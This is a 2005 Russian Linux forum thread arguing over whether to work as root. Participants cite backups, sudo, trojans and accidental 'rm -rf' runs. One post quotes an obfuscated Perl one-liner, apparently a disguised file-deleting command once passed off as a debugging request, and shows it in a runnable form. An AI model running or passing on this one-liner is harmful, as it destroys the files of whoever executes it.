Почему не надо работать под рутом? (перенесено из советов новичкам.)

Любые разговоры которые хоть как-то связаны с тематикой форума

Модератор: Модераторы разделов

Unregistered

Re: Почему не надо работать под рутом?

Сообщение Unregistered »

Пользовательские данные быкапить надо. А всю систему не забыкапишь.

Систему даже легче забэкапить. А вот десятки гигабайт пользовательских данных не особо. Тем более каждую секунду не будешь же делать новый бэкап.
На винде из защиты у меня только файерволл стоит и, тьфу-тьфу-тьфу, ещё не разу ничего.

Вобщем, мне уже спать пора, а то уже поздно...
Спасибо сказали:
t.t
Бывший модератор
Статус: думающий о вечном
ОС: Debian, LMDE

Сообщение t.t »

(Unregistered @ Понедельник, 11 Июля 2005, 18:28) писал(а):Мне мои гигабайты музыки важней.
Гигабайты музыки я держу на болванках. А от случайного затирания пользовательских данных спасает, кроме быкапа, ещё, к примеру, регулярное создание дополнительных хардлинков на всё содержимое; а на всю систему не посоздаёшь. По идее (на практике не пробовал) можно даже создавать хардлинки от имени другого (дополнительного) пользователя, а основному не давать к ним прав на запись -- тогда уж гарантия от случайного затирания стопроцентная (если, опять же, не под рутом сидеть ;)).
¡иɯʎdʞ ин ʞɐʞ 'ɐнɔɐdʞǝdu qнεиж
Спасибо сказали:
Unregistered

Сообщение Unregistered »

Иными словами, всё это достаточно эфемерно. Мне вот систему особо не в лом переустановить, если что. Данные бэкапом в винде на нтфсе лежат. А если всё и накроется медным тазом, то тут уже не до системы явно будет.
Спасибо сказали:
t.t
Бывший модератор
Статус: думающий о вечном
ОС: Debian, LMDE

Сообщение t.t »

(Unregistered @ Понедельник, 11 Июля 2005, 18:40) писал(а):Иными словами, всё это достаточно эфемерно.
Так никто ведь и не уговаривает :)

(Unregistered @ Понедельник, 11 Июля 2005, 18:40) писал(а):Мне вот систему особо не в лом переустановить, если что.
А мне, например, чаще всего переставлять систему просто _некогда_. Если она грохнется, я, пока её переставлю, заказ могу завалить; ну, завалить не завалить, но ночью потом отсиживать тоже не улыбается. А рецепт от случайного удаления пользовательских данных я дал (для примера).
¡иɯʎdʞ ин ʞɐʞ 'ɐнɔɐdʞǝdu qнεиж
Спасибо сказали:
demongloom
Статус: Добрый Демон

Сообщение demongloom »

Я сидел и щас сижу под рутом.
Типичный идиотский пример про rm -rf / уже достал. За 2 года такого ни разу в консоли не писал.
Мне проще удалить файл через mc, там наглядно видно что ты удаляешь и как.

Некоторые пользовательские вещи под рутом по умолчанию не работают; зачем ломать себе мозги, заставляя их работать?

Ну под рутом у меня только xscreensaver не работал, но и его я уговорил. Все остальное работает на ура.

5. И наконец, при подключении к сети от взлома тоже никто никогда не гарантирован на 100%; одно дело, если крякер получит доступ к вашему домашнему каталогу, и совсем другое -- если ко всей системе (включая полный доступ к файлам типа /etc/shadow и т.п.)

Ну да, 100% гарантии нет. Но какова статистика взлома линукс десктопа который лазает в нете?
1. Вероятность похватить вирус для линукса - 0,001%. Причем на обычных "левых" сайтах не подхватить, этот сайт должен хоть как то специализироваться по линуксу и давать скачивать некие файлы для линукса которые рутом нужно запустить. Убедительно прошу, дайте линк хотя бы на один такой сайт. Просто интересно посмотреть как он выглядит, так как я еще ни разу такого не видел.
2. О да!!! Вы держите супер мега сервак который по посещаемости круче offtopic.com, тогда понятно почему вас каждый день ломают. Но кому вы нужны с десктопным линуксом, с динамическим ип? Такой еще взломать нужно, так как на нем сервисы типа веб-сервера, самбы, почты, фтп не запущены, а если и запущены то специальными для этого дела пользователями.

Посмотрите статистику. Где то я читал что средний "чистый" виндовс подключенный к инету живет 4-8 минут, в то время как линукс жил чуть ли не 3-4 месяца и это время растет.

Unregistered:
Не слушай их. Они тебя запугают по самое нехочу. Сидеть в линуксе под рутом не опасней чем в виндовсе под админом. Если человек дурак, то ему и самый простой пользователь неподойдет, т.к. он на физ. уровне убьет комп раньше. Нужно просто осозновать свои действия, в том числе и использование рута. Вот и все.
Если жизнь твоя порвется, тебе новую сошьют.
Спасибо сказали:
Bolverk
Бывший модератор
ОС: Cygwin

Сообщение Bolverk »

ЕВМ, а поднять старую тему слабо? Надоело двадцатый раз пережёвывать.
А demongloom уже за это пинали и будем дальше пинать - использовать аккаунт root для повседневной деятельности не нужно.
Спасибо сказали:
Shlomo
ОС: ArchLinux

Сообщение Shlomo »

(Unregistered @ Понедельник, 11 Июля 2005, 17:23) писал(а):И ещё вот довод, почему же такой штуки, с удалением всего и вся, ещё в Windows ни с кем не случилось?

Случалось, и еще как! И со мной, и с моими знакомыми.
А почему не надо работать в root? Раньше при сидении в руте, простым нажатием на кнопку reboot (ввполен непроизвольнм - дети, например) можно было запросто завалить всю систему. Сейчас при журналируемой fs вероятность овала понизилась, но привычка у меня осталась.
А вот вполне актуальный вопрос - безапасность!! Зачем скачавть всякие апдейты к прогам и ядру, заплатки препятствующие выполнению "произвольного кода с правами суперпользователя" если ты уже сидишь под root? Я уже не говорю про самую банальную возможность что то затереть не то.
Изображение
Спасибо сказали:
Unregistered

Сообщение Unregistered »

Ну под рутом у меня только xscreensaver не работал, но и его я уговорил. Все остальное работает на ура.

Не подскажешь, как ты это сделал? А то у меня такая же сейчас проблема.

А вот вполне актуальный вопрос - безапасность!!

Если уж на то пошло, то можно поставить файервол (что я и сделал), антивирус. Заплатки я обычно не скачиваю даже под Windows (хотя конечно надо бы, но на это есть причины). А удалить можно себе всё, даже если иногда заходить под рутом (на счёт удаления смотрите аргументы выше, а то устал уже повторять).

Вобщем, выводы: хотите сидите, хотите не сидите под рутом. Противопоказаний никаких нет. Всё зависит от Ваших предпочтений и выполняемых Вами задач.
Спасибо сказали:
zenwolf
Бывший модератор
Статус: Страшный и злой
ОС: Slackware..Salix..x86_64

Сообщение zenwolf »

(Unregistered @ Вторник, 12 Июля 2005, 12:06) писал(а):Вобщем, выводы: хотите сидите, хотите не сидите под рутом. Противопоказаний никаких нет. Всё зависит от Ваших предпочтений и выполняемых Вами задач.

задача у рута одна - администрировать ,а вот пользоватся в повседневной работе
всё же пользователем нужно и дело не в предпочтениях

wolf_black добавил в 12.07.2005 07:34

(demongloom @ Вторник, 12 Июля 2005, 6:19) писал(а):Если человек мудак, то ему и самый простой пользователь неподойдет, т.к. он на физ. уровне убьет комп раньше. Нужно просто осозновать свои действия, в том числе и использование рута.

вот известная выкладка с одного извесного сайта :
Почему все говорят, что нельзя сидеть под root'ом?

Итак, вы поставили себе линукс и первое время не вылезали из-под рута - пока все настроили, пока что-то сломали и заново восстановили...

И вот теперь ваш линукс прекрасно работает, вам удобно и вроде все замечательно. Так зачем же создавать пользователя? Тем более, вы один сидите за компьютером? К тому же:

* Вы не дурак и врядли нажмете что-то не то. Вы контролируете ситуацию.

* Под линукс нет вирусов.

Я (jackill) могу рассказать, зачем.

* Права у root в linux намного выше прав администратора MS Windows. Вы можете убить любой процесс и уничтожить любой файл и работающую программу и никто не скажет вам "а-та-та, нельзя это трогать - мы это используем". Считается, что вы достаточно эксперты без электронных нянек и знаете что делаете.

* Вы не контролируете ситуацию. Показанная для смеха другу строчка с rm -rf в терминале может быть случайно вызвана промоткой истории и запущена чисто на автомате. НИКТО НЕ КОНТРОЛИРУЕТ СИТУАЦИЮ ДО КОНЦА

* Я вас разочарую насчет вирусов - их-то нет, зато черви и трояны имеются по полной программе. И многие хотели бы запуститься с правами рута, а не пытаться превысить привилегии с помощью эксплоитов, работающих не на каждом ядре. Выцепить из системы трояны довольно проблематично. И придется вам свое настроенное чудо оплакать и настраитьва все заново.

* Вы не дебил. И я не дебил. Каждый думает, что уж он-то наверняка не дебил, не маша-растеряша и уж с ним-то точно ничего не случится. У меня (jackill) "ничего не случится" произошло через два с половиной года использования линукс. Умерло все. Одна неосторожно запущенная команда. Многие пали жертвой хитрого перлового скрипта (поищите на сайте), в котором содержалась просьба запустить скрипт и проверить, почему он выпадает с ошибкой. В нем был замаскирован любимый rm -rf. Не поддавайтесь человеческой природе - не будьте самоуверены.

* Все, с чем вы работаете, может прекрасно работать и под пользователем. Да, на некоторые программы придется выставить дополнительные разрешения. Но в случае дыры в программе или при запуске левого скрипта/трояна последствия будут не столь разрушительными или же последствий не будет.

Ну если не убедил, пользуйтесь. Когда вспомните о модели безопасности, где нет места постоянной работе под рутом, будет поздно.

wolf_black добавил в 12.07.2005 07:37

(Unregistered @ Вторник, 12 Июля 2005, 12:06) писал(а):Если уж на то пошло, то можно поставить файервол (что я и сделал), антивирус.

всерьёз думаешь что всегда это поможет при современных эксплоитах ?

wolf_black добавил в 12.07.2005 07:48

http://www.lib.ru/unixhelp/grabli.txt ещё для затравки

wolf_black добавил в 12.07.2005 07:50

(demongloom @ Вторник, 12 Июля 2005, 6:19) писал(а):Не слушай их. Они тебя запугают по самое нехочу.

а вот плохие советы давать нехорошо

wolf_black добавил в 12.07.2005 07:57

(demongloom @ Вторник, 12 Июля 2005, 6:19) писал(а):Нужно просто осозновать свои действия, в том числе и использование рута. Вот и все.

но когда один всего лиш раз ошибёшся ,то будет поздно потом думать "рут-нерут" ,
а людей которые не ошибаются я не видел даже про таких не слышал

wolf_black добавил в 12.07.2005 08:05

(Unregistered @ Вторник, 12 Июля 2005, 0:40) писал(а):Иными словами, всё это достаточно эфемерно. Мне вот систему особо не в лом переустановить, если что. Данные бэкапом в винде на нтфсе лежат. А если всё и накроется медным тазом, то тут уже не до системы явно будет.

а зачем переустанавливать то ? может проще перестраховаться заранее чем
потом терять время на переустановкусистемы разворачивать тонны бэкапа
Quae videmus quo dependet vultus. (лат) - То, что мы видим, зависит от того, куда мы смотрим.
Спасибо сказали:
ddc
Бывший модератор
Статус: OpenBSD-compatible
ОС: OpenBSD -current

Сообщение ddc »

Ограничения пользователя в Linux очень логичны. Ему просто запрещается менять общую (внепользовательскую) конфигурацию компьютера. И пользуясь простым пользователем и sudo, можно достичь понимания того, насколько необходимо производимое действие.
Спасибо сказали:
zag

Сообщение zag »

Как-то на одном форуме какой-то умник запостил просьбу помочь разобраться с примерно таким кодом

Код: Выделить всё

perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Как Вы думаете, кто больше всего возмущался? Кто лишился любовно и тщательно вылизанной системы?
А кое-кто умудрился запустиь это даже на боевых серверах под рутом...........

zag добавил в 12.07.2005 10:19

Не запускайте этот код под рутом!!!Да и под обычным нежелательно, если машина шустра, не успеете остановить и лишитесь своей директории :). Создайте юзера test, вот под ним и экспериментируйте, сколько угодно.Не верите-проверьте

perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;se;print;'
Спасибо сказали:
alv
Бывший модератор
Статус: Пенсионер в законе
ОС: Cintu

Сообщение alv »

(zag @ Вторник, 12 Июля 2005, 9:19) писал(а):Не верите-проверьте

perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;se;print;'

во-во. золотые слова. только дурак надеется научиться на чужих ошибках. умный знает, что ему придется совершить их по полной программе

alv добавил в 12.07.2005 11:06

И ваще-ее-е
Сидите под рутом - если волос на ж...пе много - будет что рвать потом :-)
Спасибо сказали:
Trueash
Статус: Вещий Кассандр

Сообщение Trueash »

(Unregistered @ Понедельник, 11 Июля 2005, 18:23) писал(а):Если это пользователь обычный, то будет делать всё через GUI. Необычный до такого не докатится.

Как "обычный пользователь", отвечаю: "пользователь" =!= "дурак". Через GUI я делаю то, что мне быстрее и удобнее, и не вижу я в этом никакой крамолы.
И что мешает любому пользователю таким же макаром затереть свой профиль сидя не под рутом? А ведь там хранится всё самое важное.

Ну, например, уже вышеупомянутое наличие наличие мозгов. Хотя разные случаи бывают. Вот вам реальный пример из практики начинающего линуксоида-юзера (вашего покорного слуги). Итак, захотел я чего-то примонтировать (какой-то общий раздел в локалке). И прикрутил я его к /home/ - логично? Я же этими данными буду пользоваться? Во всяком случае, я так думал, пока не перегрузил машину. Понятно, что я увидел вместо своих данных?

А если пользователь и затрет все, "нажитое непосильным трудом", то это личное горе данного индивидуя. Совет не работать под рутом касается обеспечения сохранности системы, а не сохранности пользовательских данных (очевидно, вы это имели в виду под словом "профиль"?) Если помните, *nix - системы изначально разрабатывались как многопользовательские, поэтому если какой-то умник завалит свои данные, то не потянет при этом еще и ваши.

А систему можно и переустановить.

Можно, конечно... Можно и новую машину купить, если пепельница забьется :)
Опять же - система для обычного пользователя ничего не значит. Важнее всего - пользовательские данные.

Еще раз обращу ваше внимание на вышеописанный случай. Мои данные никуда не делись, только система их не видела (и я вместе с ней). К слову, "обычный пользователь" - такое же емкое выражение, как и "простой человек".
И ещё вот довод, почему же такой штуки, с удалением всего и вся, ещё в Windows ни с кем не случилось?  B)

Это или ваши фантазии, или недостаток опыта. Я лично видел, как товарисч снес С:\Program Files, чтобы освободить место под какую-то цацку.
"...Вы имеете право хранить молчание, все, что вы скажете, может быть использовано против вас..."
Спасибо сказали:
Unregistered

Сообщение Unregistered »

(wolf_black @ Вторник, 12 Июля 2005, 15:05) писал(а):* Вы не контролируете ситуацию. Показанная для смеха другу строчка с rm -rf в терминале может быть случайно вызвана промоткой истории и запущена чисто на автомате. НИКТО НЕ КОНТРОЛИРУЕТ СИТУАЦИЮ ДО КОНЦА
* Я вас разочарую насчет вирусов - их-то нет, зато черви и трояны имеются по полной программе. И многие хотели бы запуститься с правами рута, а не пытаться превысить привилегии с помощью эксплоитов, работающих не на каждом ядре. Выцепить из системы трояны довольно проблематично. И придется вам свое настроенное чудо оплакать и настраитьва все заново.
* Вы не дебил. И я не дебил. Каждый думает, что уж он-то наверняка не дебил, не маша-растеряша и уж с ним-то точно ничего не случится. У меня (jackill) "ничего не случится" произошло через два с половиной года использования линукс. Умерло все. Одна неосторожно запущенная команда. Многие пали жертвой хитрого перлового скрипта (поищите на сайте), в котором содержалась просьба запустить скрипт и проверить, почему он выпадает с ошибкой. В нем был замаскирован любимый rm -rf. Не поддавайтесь человеческой природе - не будьте самоуверены.

Все вы постоянно забвыете об одном: тоже самое можно сделать и иногда заходя под рутом и что спасёт ваши данные, когда какой-нибудь троян начнёт хозяйничать у вас в профиле от из-под ваших же пользовательских прав? Пользовательские данные - вот наивысшая ценность. А вы хотите сохранить ОСь. Это отголски того, что такая система прав перекочевала с серверов, а у нас не сервер. Если нужно делать бэкапы личных данных, то почему же тогда не сделать бэкап системы (или даже образ). Тем более, что она изменяется реже чем файл с какими-нибудь букмарками.

(wolf_black @ Вторник, 12 Июля 2005, 15:05) писал(а):Если уж на то пошло, то можно поставить файервол (что я и сделал), антивирус.

всерьёз думаешь что всегда это поможет при современных эксплоитах ?

А что тогда поможет? Использование прав рута? Если и спасёт, то не от того, от чего бы хотелось чтобы спас.
Да, вот ещё что, зачем, например, трояну, если он пролезет под пользователем, получать права рута? Ведь всё, что ему нужно лежит в профиле (например, адресная книга). В целом, после Windows'a, пугание троянами и вирусами как-то неубедительно.

(wolf_black @ Вторник, 12 Июля 2005, 15:05) писал(а):http://www.lib.ru/unixhelp/grabli.txt ещё для затравки

Почти всё из жизни серверов.
Для заправки: http://knoppix.ru/190405.shtml - читать, начиная где-то с середины. Для вас, правда, Робертсон не авторитет :). А кто авторитет, если не секрет?

(zag @ Вторник, 12 Июля 2005, 17:19) писал(а):Не запускайте этот код под рутом!!!Да и под обычным нежелательно, если машина шустра, не успеете остановить и лишитесь своей директории smile.gif. Создайте юзера test, вот под ним и экспериментируйте, сколько угодно.Не верите-проверьте

Вот видишь, где бы ты не запустил этот код, всё равно ничего хорошего не получится. А я бы не стал запускать этот код даже на тестовом профиле, ибо нефиг запускать того, чего не знаешь.
Спасибо сказали:
alv
Бывший модератор
Статус: Пенсионер в законе
ОС: Cintu

Сообщение alv »

(Ash @ Вторник, 12 Июля 2005, 10:53) писал(а):Можно и новую машину купить, если пепельница забьется

этих помыть? или новых нарожать?
(с) якобы цыганское
(Ash @ Вторник, 12 Июля 2005, 10:53) писал(а):"обычный пользователь" - такое же емкое выражение, как и "простой человек".

ага. "простой советский" - еще емчее :-)
Спасибо сказали:
Unregistered

Сообщение Unregistered »

Совет не работать под рутом касается обеспечения сохранности системы, а не сохранности пользовательских данных (очевидно, вы это имели в виду под словом "профиль"?)

Вот и я о том же. Но систему мне не жалко. Тем более, как же я ещё в Виндовсе ничего себе не испортил?
Если помните, *nix - системы изначально разрабатывались как многопользовательские, поэтому если какой-то умник завалит свои данные, то не потянет при этом еще и ваши.

А мне и не надо, чтобы кто-то за моим компьютером кроме меня под рутом сидел.
Спасибо сказали:
zenwolf
Бывший модератор

Сообщение zenwolf »

[quote=Unregistered,Вторник, 12 Июля 2005, 17:12]А мне и не надо, чтобы кто-то за моим компьютером кроме меня под рутом сидел.
[quote]
кстати можно вобще не подозревать ,что кто-то уже у вас под рутом сидит

[quote=Unregistered,Вторник, 12 Июля 2005, 17:12]А вы хотите сохранить ОСь
[quote]
конечно хочу ,у меня система отточена не одним днём и устновленно не одна сотня пакетов
- чтоб заново привести в такое же состояние мне потребуеся неодин день ,а на работе
вобще чревато последствиями ,да и нету как то виндовской привычки лечить ос переусатновками

[quote=Unregistered,Вторник, 12 Июля 2005, 17:12]а, вот ещё что, зачем, например, трояну, если он пролезет под пользователем, получать права рута? Ведь всё, что ему нужно лежит в профиле (например, адресная книга)
[/quote ]
в самом деле непонимаете зачем ? троян-трояну рознь ,для некоторых как раз нужны
права рута чтоб вобще запустится

[quote=Unregistered,Вторник, 12 Июля 2005, 17:12]когда какой-нибудь троян начнёт хозяйничать у вас в профиле от из-под ваших же пользовательских прав? Пользовательские данные - вот наивысшая ценность.
[quote]

во первых бэкап никто неотменял(сами же сказали) - сохраняй данные наздоровье и у пользователя и всего делов ,у меня просто на другом разделе валяются не системном
второе ну похозяйничает у меня в домашнем каталоге троян - ну и что ?
данные целые на другом разделе ,а настройки пользователя я быстро востановлю
в отличие от длительной переустановки системы
Quae videmus quo dependet vultus. (лат) - То, что мы видим, зависит от того, куда мы смотрим.
Спасибо сказали:
ddc
Бывший модератор

Сообщение ddc »

(Unregistered @ Вторник, 12 Июля 2005, 11:08) писал(а):Все вы постоянно забвыете об одном: тоже самое можно сделать и иногда заходя под рутом
А я вот после установки до сих пор ни разу под рутом не зашёл. А сессии исполнения sudo в этом смысле достатчно безопасны...
Спасибо сказали:
Topper
Бывший модератор
Статус: Насильник бабушек-педофилок
ОС: Windows 10

Сообщение Topper »

а я неоднократно спьяну движением мыши переносил папку виндоус куда-нить вглубь. просто случайно дернул мышой. тоже очень веселый эффект.
что же до рута - то скажу следующее: приведите хоть один довод в пользу работы под рутом.
Хрю.
Спасибо сказали:
Golden
ОС: Ubuntu Linux 7.10

Сообщение Golden »

1. Давайте договоримся об одной простой истине - под каким бы пользователем человек не работал, свои собственные данные он всегда успешно затрёт. Поэтому ничего кроме бекапов (регулярных) их не спасёт. И остановимся на этом. И забудем про пользовательские данные в этом топике как класс.
2. Грамотный пользователь также забекапит /etc и прочие места системы которые ему важны. Отсюда вывод - про потери данных забываем как класс. Если вы не пользуетесь бекапами - тогда ваш метод ручное застирывание.
3. Даже потеряв из-под пользовательского аккаунта свои данные, мне проще потерять 15 минут на восстановление их из бекапа, нежели 1.5 часа на установку системы (да и есть ли она под рукой или друг на два дня забрал?).
4. Переустановка системы - не смысл жизни. Кому-то нравится её переустанавливать после каждого падения, кому то - нет. Мой опыт показывает, что большинству не нравится. На основании этого давать глобальные советы типа "сидеть под рутом можно, потому как переставить систему мне не сложно" мягко говоря не совсем корректно.
Спасибо сказали:
zenwolf
Бывший модератор

Сообщение zenwolf »

(Topper @ Вторник, 12 Июля 2005, 17:18) писал(а):приведите хоть один довод в пользу работы под рутом.

вот именно ,а то пока ничего толкового невидно
Спасибо сказали:
BaRoN!
ОС: Gentoo Linux

Сообщение BaRoN! »

И ваще-ее-е
Сидите под рутом - если волос на ж...пе много - будет что рвать потом :-)

5+! :-)

Вопрос про рута задавали себе и другим, наверное, все. Я задавал его где-то 5 лет назад, кто-то задает сегодня, кто-то задаст где-то через 5 лет. Кто-то найдет ответ, лишившись волос на нижнем полушарии головного мозга. Кто-то просто прислушается, кто-то ни волос не лишится и не прислушается...
Лично я просто работал под рутом. Потом какой-то мандрейк кажется стал ругаться, говорить, что под рутом работать плохо. Ессно, я читал и в интернете, что работать под рутом плохо. Я с этим завязал, чего и прочим желаю. :-)

Причины давно написаны, пересказаны и т.п. Вот чего-чего, а музыку и фильмы мне никогда не жалко. Оно есть на болвашках, есть у друзей и т.п. Плоды моего труда мне тоже не жалко, все равно они в репозитарии на другом сервере. Но я очень расстроюсь, если потеряю настройки в домашнем каталоге, - это ж придется с конфигами снова мудрить, к иде, к шеллу, к оконному менеджеру. А на то, чтобы пересобрать и установить всю мою систему (gentoo), у меня уйдет не один день, если я вдруг все потеряю.

Ну и лично у меня рут вседа в системе. На первой консоли в текст-моде. Им я эпизодически обновляю систему. Для всего остального мне хватает моего пользователя. Вы, конечно, тоже по своему правы. Например, заболеть сифилисом можно "бытовым" путем, или по "ошибке"., даже при соблюдении всех мер предосторожности =). Но если трахать все, что движется, не пользуясь презервативами, вы увеличиваете свои шансы.

З.Ы, Настройки я бэкаплю конечно, как и /etc/, но редко. Наверное, просто пока не наступил на грабли :)
Gentoo Linux user. Играю в игру Берсерк-Онлайн.
Спасибо сказали:
demongloom

Сообщение demongloom »

Охота на ведьм и запугивание в самом разгаре :devil_2: .

Не подскажешь, как ты это сделал? А то у меня такая же сейчас проблема.

Поищи в форуме или в моих сообщениях.

* Вы не контролируете ситуацию. Показанная для смеха другу строчка с rm -rf в терминале может быть случайно вызвана промоткой истории и запущена чисто на автомате. НИКТО НЕ КОНТРОЛИРУЕТ СИТУАЦИЮ ДО КОНЦА

1. Только и делаю как для прикола пишу эти строки в консоли. Еще раз пишу, я РЕДКО ИСПОЛЬЗУЮ ЭТУ КОМАНДУ, ТАК КАК В ОСНОВНОМ ДЛЯ РАБОТ С ФАЙЛАМИ Я ИСПОЛЬЗУЮ MIDNIGHT COMMANDER, ГДЕ НАГЛЯДНО ВИДНО С ЧЕМ ТЫ РАБОТАЕШЬ И С ТЕБЯ ЕЩЕ В ДОБАВОК СПРАШИВАЮТ ПОДТВЕРЖДЕНИЕ.

2. В Виндовсе для этих целей сделана корзина. В линуксе корзина работает лишь на уровне оболочки, поэтому если удалить в консоли, то не вернешь. Поэтому не мешало бы ради безопасности реализовать корзину не на уровне оболочки, а на уровне ядра/fs. Но так ведь не хотят!!! Орут и ругаются матом что "ДУМАТЬ НАДО!!!", "НАХ НАДО?!?!?", "НАХ СТОРОННИЕ ПАТЧИ ДЛЯ ЯДРА??!", "УГРОЗА ДЛЯ БЕЗОПАСНОСТИ ЯДРА И СИСТЕМЫ!!!". В то время как нормальные люди берут и реализовывают. recycled4linux (shirka.org) помоему. Я тестировал эту корзину. Очень неплохая (правда еще альфа) реализация. Перехватывает удаления файлов как пользователя, так и программ. Поэтому если ты рут, не рут, удалил свои данные, то писец, а если есть эта корзина, то всего лишь обратно файлы из корзины перенести.

О да...
1. ядра я скачиваю с kernel.org
2. патчи для ядра ставлю cko и/или других не менее надежных разрабов.
3. обновление системы скачиваю с главного сайта моего дистра. пакеты программ устанавливаю оттуда. а если и нету пакета, то скачиваю либо с atrpms, либо с dag. В крайнем случае иду на офф. сайт проги и качаю сурсы.
4. У меня итак стоит нормальный стандартный джентельменский набор программ, поэтому всякие левые приблуды мне не нужны. Я их не скачиваю и не компилирую.
Вопрос: откуда взятся експлойту?
Вопрос: у вас эксплоит был?
Вопрос: почему так и не привели ссылку на сайт хоть с одним линукс вирусом или эксплоитом?

Я не настолько дурак что бы запускать такое. Итак понятно в чем прикол. Ну а если нашлись идиоты которые это запустили, то это их проблемы. ИМ ТО И НАДО СИДЕТЬ ПОД НОРМАЛЬНЫМ ПОЛЬЗОВАТЕЛЕМ. А у меня есть понимание что и как я делаю.

а вот плохие советы давать нехорошо
Пугать тоже не хорошо.

но когда один всего лиш раз ошибёшся ,то будет поздно потом думать "рут-нерут" ,
а людей которые не ошибаются я не видел даже про таких не слышал

На ошибках учится. Знаете, порой полезно наступать на грабли в качестве профилактики. Помогает набираться опыту. Для незнающих советую поискать мою тему про профилактические грабли.

а зачем переустанавливать то ? может проще перестраховаться заранее чем
потом терять время на переустановкусистемы разворачивать тонны бэкапа

Какие там тонны. Ставишь acronis true image и за 10-15 минут система як новенька.

zag:
Товарищ, вы если выкладываете такой опасный скрипт, то лучше немного видоизмените его (букву уберите), что бы не работал. Потому что не важно, каким шрифтом вы написали предупреждение, всегда найдется долба"б который его запустит, а потом на нас (таких как я и unregistered) будут орать что мы ненормальные. Мы нормальные! Просто изредка нас очерняют различные мудаки.
Спасибо сказали:
Golden
ОС: Ubuntu Linux 7.10

Сообщение Golden »

(demongloom @ Вторник, 12 Июля 2005, 12:29) писал(а):На ошибках учится. Знаете, порой полезно наступать на грабли в качестве профилактики. Помогает набираться опыту. Для незнающих советую поискать мою тему про профилактические грабли.

Мне некогда учиться на ошибках - мне работать надо. У меня система не для развлечений стоит.
Ещё раз повторяю свою мысль: часть людей использует компьютер дома для развлечений (фильмы, музыка, интернет), часть - для работы. И слёт системы в разных случаях приводит к разным последствиям (перенос архива музыки с болванок или срыв сроков заказов). Поэтому, давая советы типа "Дома в одиночку всегда можно сидеть под рутом" некорректно

(demongloom @ Вторник, 12 Июля 2005, 12:29) писал(а):Мы нормальные! Просто изредка нас очерняют различные мудаки.

Если нормальные, почему так раздражаетесь, что позволяете себе оскорблять других, которые в этом топике пока что не высказали в Ваш адрес ничего плохого. Здесь каждый волен высказать своё мнение, даже если оно не совпадает с Вашим.
Спасибо сказали:
polachok
Бывший модератор
Статус: главный форумный маргинал
ОС: gnu/linux

Сообщение polachok »

у меня вопрос один: А ЗАЧЕМ? зачем работать под рутом?
И немедленно выпил.
Спасибо сказали:
Warderer
Модератор
Статус: киберпИнгвин на гусеничном ходу
ОС: Debian unstable

Сообщение Warderer »

Присоединяюсь к предыдущему оратору. Зачем работать под рутом? Народ, у меня пять серверов и три рабочки, и я уже не помню, когда последний раз работал под рутом. А как сами догадываетесь, админских задач выполняется не сказал бы что сильно мало.
Читаю вслух с выражением маны - $50/ч + стоимость звонка. Настраиваю сервисы за Вас - $100/ч + стоимость выезда и проживания.
И восемь строк матом...(бесплатно)
Спасибо сказали:
Unregistered

Сообщение Unregistered »

Какие там тонны. Ставишь acronis true image и за 10-15 минут система як новенька.

И я о том же. Если можно забэкапить данные, то и систему тоже. А если у вас жёсткий полетит? Какие тогда болванки? Уж если ограничивать себя в перестраховке, то и на этот случай должно быть лекарство.
Причины давно написаны, пересказаны и т.п. Вот чего-чего, а музыку и фильмы мне никогда не жалко. Оно есть на болвашках, есть у друзей и т.п.

Если бы всё так просто. У друзей может уже и не быть (или брал там, где уже больше не взять), не всё есть на болвнках. Да и вообще, у меня к болванкам с некоторых пор появилось недоверие. Не надёжные они уж слишком.
а я неоднократно спьяну движением мыши переносил папку виндоус куда-нить вглубь.

Ctrl-Z обычно в таких случаях помогает. Кстати в винде тоже рекомендуется по обычным пользователем сидеть.
у меня вопрос один: А ЗАЧЕМ? зачем работать под рутом?

Как минимум удобно. Особенно для начинающего пользователя (с чего всё и начиналось, если помните). Да и противопоказаний особых что-то я не услышал.
Если нормальные, почему так раздражаетесь, что позволяете себе оскорблять других, которые в этом топике пока что не высказали в Ваш адрес ничего плохого.

А я-то тут при чём? Хотя мне высказывания про волосы в одном месте тоже не подуше пришлись. :angry:
Спасибо сказали:
ddc
Бывший модератор

Сообщение ddc »

(Unregistered @ Вторник, 12 Июля 2005, 13:30) писал(а):Как минимум удобно. Особенно для начинающего пользователя (с чего всё и начиналось, если помните). Да и противопоказаний особых что-то я не услышал.
Простая и красивая логика: начинающему пользователю проще запороть систему из-под root'а, а этому надо всесильно способствовать, чтобы вместо просмотра фильма/прослушивания музыки он тыркался в кнопочки настройки. Кроме того, применяем универсальное правило: если есть возможность сделать что-нибудь бесполезное, но негативных последствий не видно, это необходимо сделать. Честно говоря, когда я вижду людей, живущих по этому принципу, мне становится жалко, что в детстве они не успели применить его к розетке...
Спасибо сказали:
demongloom

Сообщение demongloom »

Если нормальные, почему так раздражаетесь, что позволяете себе оскорблять других, которые в этом топике пока что не высказали в Ваш адрес ничего плохого. Здесь каждый волен высказать своё мнение, даже если оно не совпадает с Вашим.

Извиняюсь, я имел в виду не вас, а тех кто такие перловые головоломки запускает.

Простая и красивая логика: начинающему пользователю проще запороть систему из-под root'а, а этому надо всесильно способствовать, чтобы вместо просмотра фильма/прослушивания музыки он тыркался в кнопочки настройки. Кроме того, применяем универсальное правило: если есть возможность сделать что-нибудь бесполезное, но негативных последствий не видно, это необходимо сделать. Честно говоря, когда я вижду людей, живущих по этому принципу, мне становится жалко, что в детстве они не успели применить его к розетке...

Дык пускай начинающий пользователь учится систему убивать и восстанавливать. Если человек хочет работать под рутом, это его проблемы. Если человек просто работает это одно, а если человек хочет колупать и изучать систему, то почему бы нет?

Не путайте работу и домашний комп, где хозяин сам себе бог.
Спасибо сказали:
ddc
Бывший модератор

Сообщение ddc »

(demongloom @ Вторник, 12 Июля 2005, 14:23) писал(а):Дык пускай начинающий пользователь учится систему убивать и восстанавливать.
Этому НЕ НАДО учиться. Точнее, этому НАДО НЕ учиться.
(demongloom @ Вторник, 12 Июля 2005, 14:23) писал(а):если человек хочет колупать и изучать систему, то почему бы нет?
Тут alv правильно сказал: запасайтесь волосами и рвите. Изучать систему можно и без массовых разрушений. И все операции, требующие администраторской помощи, можно делать через sudo. Очень экономит время.
Не говоря уже о том, что некоторое ПО принципиально отказывается работать под root'ом (например, winesetuptk) или работает в особом режиме (например, xcdroast).
Спасибо сказали: